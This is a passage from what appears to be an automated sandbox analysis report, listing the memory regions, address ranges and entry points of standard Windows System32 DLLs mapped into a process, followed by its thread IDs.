mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1415 start_va = 0x7ffa0b7b0000 end_va = 0x7ffa0b7f7fff monitored = 0 entry_point = 0x7ffa0b7ba1e0 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 1416 start_va = 0x7ffa0b8c0000 end_va = 0x7ffa0b91cfff monitored = 0 entry_point = 0x7ffa0b8d2bf0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 1417 start_va = 0x7ffa0b9f0000 end_va = 0x7ffa0ba09fff monitored = 0 entry_point = 0x7ffa0b9f2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1418 start_va = 0x7ffa0ba10000 end_va = 0x7ffa0ba25fff monitored = 0 entry_point = 0x7ffa0ba119f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1419 start_va = 0x7ffa0ba70000 end_va = 0x7ffa0ba7dfff monitored = 0 entry_point = 0x7ffa0ba72e50 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 1420 start_va = 0x7ffa0ba80000 end_va = 0x7ffa0bab7fff monitored = 0 entry_point = 0x7ffa0ba868f0 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 1421 start_va = 0x7ffa0baf0000 end_va = 0x7ffa0bb27fff monitored = 0 entry_point = 0x7ffa0bb08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1422 start_va = 0x7ffa0bb30000 end_va = 0x7ffa0bbc8fff monitored = 0 entry_point = 0x7ffa0bb4a090 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 1423 start_va = 0x7ffa0c7c0000 end_va = 0x7ffa0c8cafff monitored = 0 entry_point = 0x7ffa0c802610 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 1424 start_va = 0x7ffa0c9c0000 end_va = 0x7ffa0ca2ffff monitored = 0 entry_point = 0x7ffa0c9e2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1425 start_va = 0x7ffa0e910000 end_va = 0x7ffa0eac0fff monitored = 0 entry_point = 0x7ffa0e963690 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 1426 start_va = 0x7ffa0ed60000 end_va = 0x7ffa0ee27fff monitored = 0 entry_point = 0x7ffa0eda13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1427 start_va = 0x7ffa0f3e0000 end_va = 0x7ffa0f3f0fff monitored = 0 entry_point = 0x7ffa0f3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1428 start_va = 0x7ffa0ff00000 end_va = 0x7ffa0ff08fff monitored = 0 entry_point = 0x7ffa0ff019a0 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 1429 start_va = 0x7ffa0ff10000 end_va = 0x7ffa0ff1afff monitored = 0 entry_point = 0x7ffa0ff11cd0 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 1430 start_va = 0x7ffa0ff30000 end_va = 0x7ffa0ff47fff monitored = 0 entry_point = 0x7ffa0ff35910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1431 start_va = 0x7ffa11220000 end_va = 0x7ffa113a5fff monitored = 0 entry_point = 0x7ffa1126d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1432 start_va = 0x7ffa11410000 end_va = 0x7ffa11422fff monitored = 0 entry_point = 0x7ffa11412760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1433 start_va = 0x7ffa117d0000 end_va = 0x7ffa117f6fff monitored = 0 entry_point = 0x7ffa117d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1434 start_va = 0x7ffa11800000 end_va = 0x7ffa118a9fff monitored = 0 entry_point = 0x7ffa11827910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1435 start_va = 0x7ffa11b10000 end_va = 0x7ffa11b41fff monitored = 0 entry_point = 0x7ffa11b22340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1436 start_va = 0x7ffa11d90000 end_va = 0x7ffa11db3fff monitored = 0 entry_point = 0x7ffa11d93260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1437 start_va = 0x7ffa11f30000 end_va = 0x7ffa12023fff monitored = 0 entry_point = 0x7ffa11f3a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1438 start_va = 0x7ffa121a0000 end_va = 0x7ffa121abfff monitored = 0 entry_point = 0x7ffa121a27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1439 start_va = 0x7ffa12280000 end_va = 0x7ffa122b0fff monitored = 0 entry_point = 0x7ffa12287d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1440 start_va = 0x7ffa124f0000 end_va = 0x7ffa1250efff monitored = 0 entry_point = 0x7ffa124f5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1441 start_va = 0x7ffa12660000 end_va = 0x7ffa126bbfff monitored = 0 entry_point = 0x7ffa12676f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1442 start_va = 0x7ffa12830000 end_va = 0x7ffa1283afff monitored = 0 entry_point = 0x7ffa128319a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1443 start_va = 0x7ffa12a10000 end_va = 0x7ffa12a3cfff monitored = 0 entry_point = 0x7ffa12a29d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1444 start_va = 0x7ffa12ba0000 end_va = 0x7ffa12bf5fff monitored = 0 entry_point = 0x7ffa12bb0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1445 start_va = 0x7ffa12c20000 end_va = 0x7ffa12c48fff monitored = 0 entry_point = 0x7ffa12c34530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1446 start_va = 0x7ffa12d90000 end_va = 0x7ffa12da3fff monitored = 0 entry_point = 0x7ffa12d952e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1447 start_va = 0x7ffa12db0000 end_va = 0x7ffa12dbffff monitored = 0 entry_point = 0x7ffa12db56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1448 start_va = 0x7ffa12dc0000 end_va = 0x7ffa12e0afff monitored = 0 entry_point = 0x7ffa12dc35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1449 start_va = 0x7ffa12e10000 end_va = 0x7ffa12e1efff monitored = 0 entry_point = 0x7ffa12e13210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1450 start_va = 0x7ffa12f40000 end_va = 0x7ffa13106fff monitored = 0 entry_point = 0x7ffa12f9db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1451 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1452 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1453 start_va = 0x7ffa13390000 end_va = 0x7ffa133d2fff monitored = 0 entry_point = 0x7ffa133a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1454 start_va = 0x7ffa133e0000 end_va = 0x7ffa13465fff monitored = 0 entry_point = 0x7ffa133ed8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1455 start_va = 0x7ffa13b70000 end_va = 0x7ffa13cb2fff monitored = 0 entry_point = 0x7ffa13b98210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1456 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1457 start_va = 0x7ffa13d60000 end_va = 0x7ffa13d67fff monitored = 0 entry_point = 0x7ffa13d61ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1458 start_va = 0x7ffa13d80000 end_va = 0x7ffa13ed5fff monitored = 0 entry_point = 0x7ffa13d8a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1459 start_va = 0x7ffa13ee0000 end_va = 0x7ffa14065fff monitored = 0 entry_point = 0x7ffa13f2ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1460 start_va = 0x7ffa14070000 end_va = 0x7ffa140cafff monitored = 0 entry_point = 0x7ffa140838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1461 start_va = 0x7ffa14220000 end_va = 0x7ffa142c6fff monitored = 0 entry_point = 0x7ffa1422b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1462 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1463 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1464 start_va = 0x7ffa146e0000 end_va = 0x7ffa1474afff monitored = 0 entry_point = 0x7ffa146f90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1465 start_va = 0x7ffa147c0000 end_va = 0x7ffa14880fff monitored = 0 entry_point = 0x7ffa147e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1466 start_va = 0x7ffa15090000 end_va = 0x7ffa15136fff monitored = 0 entry_point = 0x7ffa150a58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1467 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1468 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1491 start_va = 0xe00000 end_va = 0xe24fff monitored = 0 entry_point = 0xe0b320 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Thread: id = 114 os_tid = 0x10a0 Thread: id = 115 os_tid = 0x10a4 Thread: id = 116 os_tid = 0xd7c Thread: id = 117 os_tid = 0x17c Thread: id = 118 os_tid = 0x6a4 Thread: id = 119 os_tid = 0x13c4 Thread: id = 120 os_tid = 0x340 Thread: id = 121 os_tid = 0xac0 Thread: id = 122 os_tid = 0x8c0 Thread: id = 123 os_tid = 0xb84 Thread: id = 124 os_tid = 0xafc Thread: id = 125 os_tid = 0x478 Thread: id = 126 os_tid = 0x468 Thread: id = 127 os_tid = 0x458 Thread: id = 128 os_tid = 0x450 Thread: id = 129 os_tid = 0x44c Thread: id = 130 os_tid = 0x434 Thread: id = 131 os_tid = 0x42c Thread: id = 132 os_tid = 0x8 Thread: id = 133 os_tid = 0x348 Thread: id = 134 os_tid = 0x324 Thread: id = 135 os_tid = 0x2f4 Thread: id = 136 os_tid = 0x174 Thread: id = 137 os_tid = 0x284 Thread: id = 138 os_tid = 0x394